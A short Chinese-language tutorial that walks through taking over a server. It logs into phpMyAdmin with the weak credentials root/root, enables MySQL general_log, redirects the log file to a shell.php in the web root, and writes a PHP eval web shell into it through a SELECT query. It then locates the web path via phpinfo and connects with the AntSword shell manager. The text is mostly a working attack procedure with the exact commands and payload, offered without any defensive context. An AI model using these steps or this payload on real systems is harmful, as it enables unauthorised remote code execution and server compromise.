扫描获取phpmyadmin并通过弱口令进入后台！

弱密码root root

查看mysql的日志状态

查看mysql的日志状态，默认是关闭的，因为这个日志的量非常大对资源是一个比较大的开销

show global variables like '%secure%';

general_log为是否支持写入

general_log_file为日志保存的位置

打开日志读写setglobal general_log =on;

修改邮箱日志路径

修改一下路径set global general_log_file='C:\myphp_www\PHPTutorial\MySQL\data\shell.php';

写入马

将马写入日志中！！！

通过select查询操作写入日志

查看一下是否写入：select '<?php @eval($_POST[xxx]); ?';>

成功写入

再通过phpinfo查找一下绝对路径

最后成功连接

总结步骤：

1、SHOW VARIABLES LIKE '%general%' 查看配置默认是关闭状态

2、set global general_log = on; 开启general_log模式

3、set global general_log_file='日志路径\shell.php'; 修改日志目录为shell地址

（set global general_log_file='C:\myphp_www\PHPTutorial\WWW\public\shell.php';）

4、select ' <?php eval($_POST[cc]);? '

写入shell因为开启了日志记录功能，所执行的sql语句都会被记录在日志中

5.日志路径通过扫描端口phpinfo.php获得

6.连接蚁剑！